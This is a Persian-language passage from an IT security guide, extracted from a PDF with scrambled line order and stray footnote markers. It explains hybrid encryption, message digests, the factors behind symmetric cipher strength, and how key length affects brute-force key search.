‫ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻛﻪ ﻛﻨﺪﺗﺮ ﺍﺳﺖ ﺑﺮﺍﻱ ﺗﺒﺎﺩﻝ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰ ﺗﺼﺎﺩﻓﻲ ﺟﻠﺴﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ‪ ،‬ﻛـﻪ‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺒﻨﺎﻱ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻛﻠﻴﺪ ﺭﻣﺰ ﺧﺼﻮﺻﻲ ﻣﺘﻘﺎﺭﻥ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ )ﻳﻚ "ﻛﻠﻴﺪ ﺭﻣﺰ ﺩﻭﺭﻩ" ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﻳﻚ ﺩﻭﺭﻩ ﻭﺍﺣﺪ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺑﻜـﺎﺭ‬
‫ﻣﻲﺭﻭﺩ ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﻛﻨﺎﺭ ﮔﺬﺍﺷﺘﻪ ﻣﻲﺷﻮﺩ(‪ .‬ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﺔ ﭘﻴﺎﺩﻩﺳﺎﺯﻱﻫﺎﻱ ﻋﻤﻠﻲ ﺭﻣﺰﻧﮕﺎﺭﻱﻫﺎﻱ ﻫﻤﮕﺎﻧﻲ ﺍﺯ ﻧـﻮﻉ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺩﻭﮔﺎﻧـﻪ ﻫـﺴﺘﻨﺪ‪.‬‬
‫ﻧﻜﺘﻪ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺩﺳﺘﺔ ﺧﺎﺻﻲ ﺍﺯ ﺗﻮﺍﺑﻊ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﻴﺸﻪ ﺑﺎ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕـﺎﻧﻲ ﺍﺯ ﺁﻧﻬـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ‪ .‬ﺍﻳـﻦ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺍﺻﺎﻟﺘﹰﺎ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻴﺴﺘﻨﺪ‪ ،‬ﺑﻠﻜﻪ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ "ﺍﺛﺮ ﺍﻧﮕﺸﺖ" ﺍﺯ ﻳﻚ ﻓﺎﻳﻞ ﻳﺎ ﻛﻠﻴﺪ ﺭﻣﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪:‬‬
‫ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ‬
‫ﻳﻚ ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻳﻚ ﺍﻟﮕﻮﻱ ﺑﻪ ﻇﺎﻫﺮ ﺗﺼﺎﺩﻓﻲ ﺍﺯ ﺑﻴﺘﻬﺎ ﺑﺮﺍﻱ ﻫﺮ ﻭﺭﻭﺩﻱ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ‪ .‬ﻣﻘﺪﺍﺭ ﺧﻼﺻﻪ ﺑﻪ ﻧﺤﻮﻱ ﻣﺤﺎﺳﺒﻪ ﻣـﻲﺷـﻮﺩ‬
‫ﻛﻪ ﻳﺎﻓﺘﻦ ﻳﻚ ﻭﺭﻭﺩﻱ ﻛﻪ ﺩﻗﻴﻘﹰﺎ ﻳﻚ ﺧﻼﺻﺔ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺗﻮﻟﻴﺪ ﻛﻨﺪ ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻧﺒﺎﺷﺪ‪ .‬ﺧﻼﺻﻪﭘﻴﺎﻣﻬﺎ ﻏﺎﻟﺒﹰﺎ "ﺍﺛﺮ ﺍﻧﮕﺸﺖ‬
‫ﻓﺎﻳﻠﻬﺎ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺑﻪ ﺟﺎﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺍﺻﻠﻲ ﻓﺎﻳﻞ‪ ،‬ﺧﻼﺻﻪﭘﻴﺎﻡ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻗﺪﺭﺕ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﻟﮕﻮﺭﻳﺘﻢﻫﺎﻱ ﻣﺘﻘﺎﺭﻥ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺍﺯ ﻧﻈﺮ ﻗﺪﺭﺕ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺑﺮﺍﺑﺮ ﻧﻴﺴﺘﻨﺪ‪ .‬ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺯ ﻧﻈﺮ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ﭼﻨﺪﺍﻥ ﺧـﻮﺏ ﻋﻤـﻞ‬
‫ﻧﻤﻲﻛﻨﻨﺪ ﻭ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﺷﺪﻩ ﺑﺪﻭﻥ ﺩﺍﻧﺴﺘﻦ ﻛﻠﻴﺪ ﻻﺯﻡ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺷﻮﻧﺪ‪ .‬ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺣﺘﻲ ﺩﺭ ﻣﻘﺎﺑـﻞ‬
‫ﻗﻮﻳﺘﺮﻳﻦ ﺣﻤﻠﻪﻫﺎ ﻫﻢ ﺑﺴﻴﺎﺭ ﻣﻘﺎﻭﻡ ﻫﺴﺘﻨﺪ‪ .‬ﻗﺎﺑﻠﻴﺖ ﺣﻔﺎﻇﺖ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤﻠﻪ ﺍﺳﺘﺤﻜﺎﻡ‪ ٧٩‬ﻧـﺎﻡ ﺩﺍﺭﺩ‪ .‬ﺍﺳـﺘﺤﻜﺎﻡ ﺑـﻪ‬
‫ﻋﻮﺍﻣﻞ ﺯﻳﺎﺩﻱ ﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ ﺍﺯ ﺟﻤﻠﻪ‪:‬‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫‪Session Random Key‬‬
‫‪Strength‬‬
‫‪Known Plaintext Attack‬‬
‫‪78‬‬
‫‪79‬‬
‫‪80‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫•‬
‫ﺳﺮﻱ ﺑﻮﺩﻥ ﻛﻠﻴﺪ ﺭﻣﺰ؛‬
‫ّ‬
‫ﻻ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻳـﺎ ﺣـﺪﺱ ﺯﺩﻥ‬
‫ﻣﺸﻜﻞ ﺑﻮﺩﻥ ﺍﻣﻜﺎﻥ ﺣﺪﺱ ﻛﻠﻴﺪ ﻳﺎ ﺍﻣﻜﺎﻥ ﺁﺯﻣﺎﻳﺶ ﻫﻤﺔ ﻛﻠﻴﺪﻫﺎﻱ ﻣﻤﻜﻦ )ﺟﺴﺘﺠﻮﻱ ﻛﻠﻴﺪ ﺭﻣﺰ(‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰ ﻃﻮﻻﻧﻲﺗﺮ ﻣﺸﻜﻠﺘﺮ ﺍﺳﺖ؛‬
‫ﺩﺷﻮﺍﺭ ﺑﻮﺩﻥ ﻣﻌﻜﻮﺱ ﻛﺮﺩﻥ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺪﻭﻥ ﺩﺍﻧﺴﺘﻦ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ )ﺷﻜﺴﺘﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ(؛‬
‫ﻋﺪﻡ ﻭﺟﻮﺩ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ‪ ،‬ﻳﺎ ﺷﺮﺍﻳﻂ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﻳﻚ ﻓﺎﻳﻞ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺑﺪﻭﻥ ﺩﺍﻧﺴﺘﻦ ﻛﻠﻴـﺪ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﺁﺳـﺎﻧﺘﺮ‬
‫ﺭﻣﺰﮔﺸﺎﻳﻲ ﺷﻮﺩ؛‬
‫ﻧﺎﻣﻤﮑﻦ ﺑﻮﺩﻥ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻳﻚ ﭘﻴﺎﻡ ﻛﻪ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ‪ ،‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺑﺪﺍﻧﻴﺪ ﭼﮕﻮﻧﻪ ﺑﺨﺸﻲ ﺍﺯ ﺁﻥ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﺷـﻮﺩ‬
‫)ﻛﻪ ﺣﻤﻠﻪ ﻣﺘﻦ ﺳﺎﺩﺓ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ‪ ٨٠‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ(؛ ﻭ‬
‫ﻼ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﮔﺮ ﻫﻤﺔ ﭘﻴﺎﻣﻬﺎﻱ ﺭﻣﺰﺷـﺪﻩ ﺩﺭ ﻳـﻚ ﺳﻴـﺴﺘﻢ‬
‫ﺧﺼﻮﺻﻴﺎﺕ "ﻣﺘﻦ ﺳﺎﺩﻩ" ﻭ ﺩﺍﻧﺶ ﻳﻚ ﻣﻬﺎﺟﻢ ﺑﻪ ﺁﻥ ﺧﺼﻮﺻﻴﺎﺕ‪ ،‬ﻣﺜ ﹰ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺎ ﻳﻚ ﻗﻄﻌﻪ ﺷﻨﺎﺧﺘﻪﺷﺪﺓ "ﻣﺘﻦﺳﺎﺩﻩ" ﺷﺮﻭﻉ ﺷﻮﺩ ﻳﺎ ﺧﺎﺗﻤﻪ ﻳﺎﺑﺪ‪ ،‬ﺁﻥ ﺳﻴﺴﺘﻢ ﻧﺴﺒﺖ ﺑﻪ ﺣﻤﻠﻪ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺑﺎﺷﺪ‪.‬‬
‫‪٢٩٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺩﺭ ﺣﺎﻟﺖ ﻛﻠﻲ ﺍﺳﺘﺤﻜﺎﻡ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺛﺒﺎﺕ ﻧﻤﻲﺷﻮﺩ؛ ﺑﻠﻜﻪ ﺗﻨﻬﺎ ﺭﺩ ﻣﻲﺷﻮﺩ‪ .‬ﻭﻗﺘﻲ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺟﺪﻳﺪ ﻣﻄﺮﺡ ﻣﻲﺷﻮﺩ‪ ،‬ﻣﺒﺘﻜـﺮ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻢ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﻴﺸﻪ ﺑﺮ ﺍﻳﻦ ﺑﺎﻭﺭ ﺍﺳﺖ ﻛﻪ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺗﻀﻤﻴﻦﻛﻨﻨﺪﺓ ﺍﻣﻨﻴﺖ ﻛﺎﻣﻞ ﺍﺳﺖ ‪ -‬ﻳﻌﻨﻲ ﻣﺒﺘﻜﺮ ﻣﻌﺘﻘـﺪ ﺍﺳـﺖ ﻛـﻪ ﺭﺍﻫـﻲ ﺑـﺮﺍﻱ‬
‫ﺭﻣﺰﮔﺸﺎﻳﻲ ﭘﻴﺎﻡ ﺭﻣﺰﺷﺪﻩ ﺑﺪﻭﻥ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺮﺑﻮﻃﻪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ ،‬ﭼﺮﺍ ﻛﻪ ﺍﮔﺮ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺩﺍﺭﺍﻱ ﻳـﻚ ﻧﻘـﺺ ﺷـﻨﺎﺧﺘﻪ ﺷـﺪﻩ‬
‫ﻻ ﻣﺒﺘﻜﺮ ﺩﺭ ﻭﺣﻠﻪ ﺍﻭﻝ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﺍ ﭘﻴﺸﻨﻬﺎﺩ ﻧﻤﻲﻛﻨﺪ )ﻳﺎ ﺣﺪﺍﻗﻞ ﺑﺎ ﺧﻴﺎﻝ ﺁﺳﻮﺩﻩ ﺁﻧﺮﺍ ﭘﻴﺸﻨﻬﺎﺩ ﻧﻤﻲﻛﻨﺪ(‬
‫ﺑﺎﺷﺪ‪ ،‬ﺍﺻﻮ ﹰ‬
‫ﺑﻌﻨﻮﺍﻥ ﺑﺨﺸﻲ ﺍﺯ ﺑﺮﺭﺳﻲ ﺍﺳﺘﺤﻜﺎﻡ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ‪ ،‬ﻳﻚ ﺭﻳﺎﺿﻴﺪﺍﻥ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺸﺎﻥ ﺩﻫﺪ ﻛﻪ ﺍﻟﮕﻮﺭﺗﻴﻢ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﻧـﻮﺍﻉ ﺧﺎﺻـﻲ ﺍﺯ ﺣﻤـﻼﺕ‬
‫ﻼ ﺑﺮﺍﻱ ﻧﺸﺎﻥ ﺩﺍﺩﻥ ﻧﻘﺎﻳﺺ ﺳﺎﻳﺮ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺑﻜﺎﺭ ﺭﻓﺘﻪﺍﻧﺪ ﻣﻘﺎﻭﻡ ﺍﺳﺖ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺣﺘﻲ ﺍﻟﮕﻮﺭﻳﺘﻤﻲ ﻛـﻪ ﻧـﺴﺒﺖ ﺑـﻪ ﻫﻤـﺔ ﺣﻤـﻼﺕ‬
‫ﻛﻪ ﻗﺒ ﹰ‬
‫ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ﻣﻘﺎﻭﻡ ﺑﺎﺷﺪ ﻫﻢ ﺍﻟﺰﺍﻣﹰﺎ ﺍﻳﻤﻦ ﻧﻴﺴﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﺑﻄﻮﺭ ﻣﺘﻮﺍﻟﻲ ﺍﻧﻮﺍﻉ ﺟﺪﻳﺪ ﺣﻤﻼﺕ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ‪.‬‬
‫ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﺮﺧﻲ ﺍﺯ ﺍﻓﺮﺍﺩ ﻳﺎ ﻣﺆﺳﺴﺎﺕ ﺍﺩﻋﺎ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﻛﻪ ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭ ﺯﻳـﺎﺩﺗﺮﻱ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎﻱ‬
‫ﻣﻮﺟﻮﺩ ﺩﺍﺭﻧﺪ ﺍﺑﺪﺍﻉ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﻋﻤﻮﻣﹰﺎ ﻧﺒﺎﻳﺪ ﺍﺯ ﺍﻳﻦ ﺍﺩﻋﺎﻫﺎ ﺯﻳﺎﺩ ﺍﺳﺘﻘﺒﺎﻝ ﻛﺮﺩ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﻣـﺮﻭﺯﻩ ﻫـﻴﭻ ﺣﻤﻠـﺔ ﺷـﻨﺎﺧﺘﻪ ﺷـﺪﻩﺍﻱ ﺩﺭ ﻣﻘﺎﺑـﻞ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﻄﻮﺭ ﮔﺴﺘﺮﺩﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﺷﺪ‪ ،‬ﺩﻟﻴﻠﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺟﺪﻳـﺪ‬
‫ﻭ ﺁﺯﻣﻮﻥﻧﺸﺪﻩ ‪ -‬ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺭﺍﻱ ﻧﻘﺎﻳﺺ ﭘﻨﻬﺎﻥ ﺑﺎﺷﻨﺪ ‪ -‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫ﻃﻮﻝ ﻛﻠﻴﺪ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﻣﺘﻘﺎﺭﻥ‬
‫ﻛﻠﻴﺪﻫﺎﻱ ﺑﺎ ﻃﻮﻝ ﻛﻢ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻣﻨﻴﺖ ﭘﻴﺎﻣﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﻪ ﻣﻴﺰﺍﻥ ﺯﻳﺎﺩﻱ ﺧﺪﺷﻪﺩﺍﺭ ﻛﻨﻨﺪ‪ ،‬ﺯﻳﺮﺍ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﭘﻴـﺎﻡ ﺭﺍ ﺑـﺎ ﻫـﺮ‬
‫ﻛﻠﻴﺪ ﻣﻤﻜﻦ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ ﺗﺎ ﻣﺤﺘﻮﺍﻱ ﭘﻴﺎﻡ ﺍﺳﺘﺨﺮﺍﺝ ﺷﻮﺩ‪ .‬ﺍﻣﺎ ﺿﻤﻦ ﺍﻳﻨﻜﻪ ﻛﻠﻴﺪﻫﺎﻱ ﻛﻮﺗـﺎﻩ ﺍﻳﻤﻨـﻲ ﻧـﺴﺒﺘﹰﺎ ﻛﻤـﻲ ﻓـﺮﺍﻫﻢ ﻣـﻲﻛﻨﻨـﺪ‪،‬‬
‫ﻛﻠﻴﺪﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻃﻮﻻﻧﻲ ﻫﻢ ﺩﺭ ﻋﻤﻞ ﻟﺰﻭﻣﹰﺎ ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﺑـﺎ ﻃـﻮﻝ ﻣﺘﻌـﺎﺩﻝ ﻓـﺮﺍﻫﻢ ﻧﻤـﻲﻧﻤﺎﻳﻨـﺪ‪ .‬ﻳﻌﻨـﻲ ﻫﺮﭼﻨـﺪ‬
‫ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰ ‪ ۴۰‬ﺗﺎ ‪ ۵۶‬ﺑﻴﺘﻲ ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﻧﺪﺍﺭﻧﺪ‪ ،‬ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰ ‪ ۲۵۶‬ﺑﻴﺘﻲ ﺍﻣﻨﻴﺖ ﭼﻨﺎﻥ ﺯﻳﺎﺩﺗﺮﻱ ﺍﺯ ﻳـﻚ ﻛﻠﻴـﺪ ‪ ۱۶۸‬ﻳـﺎ ﺣﺘـﻲ‬
‫‪ ۱۲۸‬ﺑﻴﺘﻲ ﻓﺮﺍﻫﻢ ﻧﻤﻲﻛﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺗﻼﺵ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﻳﻚ ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﻴﺪ ﻭ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰ ﺭﺍ ﻧﺪﺍﺭﻳﺪ‪ ،‬ﺁﺳﺎﻧﺘﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﭘﻴـﺎﻡ ﺍﻧﺠـﺎﻡ‬
‫ﻳﻚ ﺣﻤﻠﺔ ‪ brute force‬ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺣﻤﻼﺕ ﻫﻤﭽﻨﻴﻦ "ﺣﻤﻼﺕ ﺟﺴﺘﺠﻮﻱ ﻛﻠﻴﺪ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﭼﻮﻥ ﻫﺮ ﻛﻠﻴـﺪ ﻣﻤﻜـﻦ ﺭﺍ ﺁﺯﻣـﺎﻳﺶ‬
‫ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﻣﺸﺨﺺ ﺷﻮﺩ ﻛﻪ ﺁﻳﺎ ﺁﻥ ﻛﻠﻴﺪ ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻛﻨﺪ ﻳﺎ ﻧﻪ‪ .‬ﺍﮔﺮ ﻛﻠﻴﺪ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﺍﻧﺘﺨﺎﺏ ﺷـﻮﺩ‪ ،‬ﺁﻧﮕـﺎﻩ ﻣﻬـﺎﺟﻢ ﺑﻄـﻮﺭ‬
‫ﻣﺘﻮﺳﻂ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻛﻪ ﻧﺼﻒ ﻫﻤﺔ ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰ ﻣﻤﻜﻦ ﺭﺍ ﺑﺮﺍﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻭﺍﻗﻌﻲ ﺁﺯﻣﺎﻳﺶ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺩﺭ ﺩﺍﺧﻞ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺕ ﻳﻚ ﺭﺷﺘﻪ ﺍﺭﻗﺎﻡ ﺩﻭﺩﻭﻳﻲ‪ ٨١‬ﻧﻤﺎﻳﺶ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﻫﺮﻋﺪﺩ ﺩﻭﺩﻭﻳﻲ ﻣﻲﺗﻮﺍﻧﺪ ‪ ۰‬ﻳﺎ ‪ ۱‬ﺑﺎﺷﺪ‪ .‬ﺩﺭ‬
‫ﺣﺎﻟﺖ ﻛﻠﻲ‪ ،‬ﻫﺮ ﺑﻴﺖ ﻛﻪ ﺑﻪ ﻛﻠﻴﺪ ﺭﻣﺰ ﺍﺿﺎﻓﻪ ﺷﻮﺩ ﺗﻌﺪﺍﺩ ﻛﻠﻴﺪﻫﺎ ﺭﺍ ﺩﻭﺑﺮﺍﺑﺮ ﻣﻲﻛﻨﺪ‪ .‬ﻟﺬﺍ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﮐﻪ "ﭼﻪ ﺗﻌﺪﺍﺩ ﺑﻴﺖ ﺑﺮﺍﻱ ﺳـﺎﺧﺘﻦ ﻳـﻚ‬
‫ﻛﻠﻴﺪ ﺍﻳﻤﻦ ﻛﺎﻓﻲ ﺍﺳﺖ" ﺑﺴﺘﮕﻲ ﺑﻪ ﺍﻳﻦ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻢ ﺑﺎ ﭼﻪ ﺳﺮﻋﺘﻲ ﺑﺘﻮﺍﻧﺪ ﻛﻠﻴﺪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﺁﺯﻣـﺎﻳﺶ ﻛﻨـﺪ ﻭ ﺷـﻤﺎ ﺑﺨﻮﺍﻫﻴـﺪ ﭼـﻪ‬
‫ﻣﺪﺗﻲ ﺍﻃﻼﻋﺎﺗﺘﺎﻥ ﺭﺍ ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺭﻳﺪ‪ .‬ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ‪ ۱۰‬ﻛﻠﻴﺪ ﺭﺍ ﺩﺭ ﻫﺮ ﺛﺎﻧﻴﻪ ﺁﺯﻣﺎﻳﺶ ﻛﻨﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﻳﻚ ﻛﻠﻴﺪ ‪ ۴۰‬ﺑﻴﺘـﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﻳـﻚ‬
‫ﭘﻴﺎﻡ ﺭﺍ ﺑﻴﺶ ﺍﺯ ‪ ۳۴۸۴‬ﺳﺎﻝ ﺣﻔﺎﻇﺖ ﻧﻤﺎﻳﺪ‪ .‬ﺍﻟﺒﺘﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺍﻣﺮﻭﺯﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭼﻨﺪﻳﻦ ﻫﺰﺍﺭ ﻛﻠﻴـﺪ ‪ -‬ﻭ ﺑـﺎ ﺳـﺨﺖﺍﻓـﺰﺍﺭ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﻣﺨﺼﻮﺹ‪ ،‬ﺻﺪﻫﺎ ﻫﺰﺍﺭ ﻛﻠﻴﺪ ‪ -‬ﺭﺍ ﺩﺭ ﺛﺎﻧﻴﻪ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻨﺪ‪ .‬ﺳﺮﻋﺖ ﺟﺴﺘﺠﻮﻱ ﻛﻠﻴﺪ ﻣﻲﺗﻮﺍﻧـﺪ ﺑـﺎ ﺍﺟـﺮﺍﻱ ﺑﺮﻧﺎﻣـﺔ ﻣـﺸﺎﺑﻪ ﺭﻭﻱ ﺻـﺪﻫﺎ ﻳـﺎ‬
‫ﻫﺰﺍﺭﺍﻥ ﺭﺍﻳﺎﻧﻪ ﺑﻄﻮﺭ ﻫﻤﺰﻣﺎﻥ‪ ،‬ﺑﻴﺶ ﺍﺯ ﺍﻳﻦ ﻫﻢ ﺍﻓﺰﺍﻳﺶ ﻳﺎﺑﺪ‪ .‬ﭘﺲ ﺑﺎ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﻣﺮﻭﺯﻱ ﺍﻣﻜﺎﻥ ﺑﺮﺭﺳﻲ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻣﻴﻠﻴﻮﻥ ﻛﻠﻴﺪ ﺩﺭ ﺛﺎﻧﻴﻪ‬
